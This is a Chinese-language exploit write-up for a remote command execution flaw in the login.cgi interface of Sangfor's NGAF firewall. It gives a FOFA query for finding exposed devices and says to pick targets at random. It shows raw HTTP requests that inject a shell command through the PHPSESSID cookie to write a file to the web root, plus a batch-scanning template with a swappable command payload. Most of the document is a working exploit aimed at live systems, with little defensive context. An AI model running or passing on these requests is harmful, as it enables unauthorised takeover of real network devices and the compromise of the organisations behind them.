深信服下一代防火墙NGAF login远程命令执行漏洞

漏洞描述

深信服下一代防火墙（Next-Generation Application Firewall）NGAF是面向应用层设计，能够精确识别用户、应用和内容，具备完整安全防护能力，能够全面替代传统防火墙，并具有强劲应用层处理能力的全新网络安全设备。深信服下一代防火墙（Next-Generation Application Firewall）NGAF的login.cgi接口对用户传入的参数未进行有效的过滤，攻击者可利用该漏洞获取服务器的权限。

漏洞复现

步骤一：在Fofa中搜索以下语法并随机确定要进行攻击测试的目标....

#FOFA搜索语法app="SANGFOR-防火墙类产品"

步骤二：开启代理并打开BP对其首页进行抓包拦截....修改请求包内容....在响应数据包的正文中返回{"yn":"yes","str":"OK"}，即可登录。

POST /cgi-bin/login.cgi HTTP/1.1Host: IPUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36Connection: closeContent-Length: 112Content-Type: Application/X-www-FormCookie: PHPSESSID=`$(echo 12345~ > /fwlib/sys/virus/webui/svpn_html/qwer.txt)`;Accept-Encoding: gzip {"opr":"login", "data":{"user": "watchTowr" , "pwd": "watchTowr" , "vericode": "EINW" , "privacy_enable": "0"}}

步骤三：访问/svpn_html/qwer.txt路径，修改数据包内容。

GET /svpn_html/qwer.txt HTTP/1.1Host: ipY-Forwarded-For: 127.0.0.1Sec-Ch-Ua: Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: ""Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: close

批量脚本

id: sangfor-ngfw-login-rceinfo:  name: sangfor-ngfw-login-rce  author: Dreamkoi  severity: high  description: 深信服下一代防火墙（Next-Generation Application Firewall）NGAF是面向应用层设计，能够精确识别用户、应用和内容，具备完整安全防护能力，能够全面替代传统防火墙，并具有强劲应用层处理能力的全新网络安全设备。深信服下一代防火墙（Next-Generation Application Firewall）NGAF的login.cgi接口对用户传入的参数未进行有效的过滤，攻击者可利用该漏洞获取服务器的权限。  tags: sangfor,rce  metadata:    fofa-qeury: app="SANGFOR-防火墙类产品"    veified: true    max-request: 2http:  - raw:      - |              POST /cgi-bin/login.cgi HTTP/1.1        Host:         User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36        Content-Type: Application/X-www-Form        Cookie: PHPSESSID=`$({{rce}})`;         {"opr":"login", "data":{"user": "watchTowr" , "pwd": "watchTowr" , "vericode": "EINW" , "privacy_enable": "0"}}      - |              GET /svpn_html/666666.txt HTTP/1.1        Host:         User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36        Y-Forwarded-For: 127.0.0.1          payloads:      rce:        - "echo 66666 > /fwlib/sys/virus/webui/svpn_html/666666.txt"    matchers:           - type: dsl        name: sqlserver        dsl:          - "status_code_1 == 200 && contains(body,'66666') && contains(header,'text/plain')"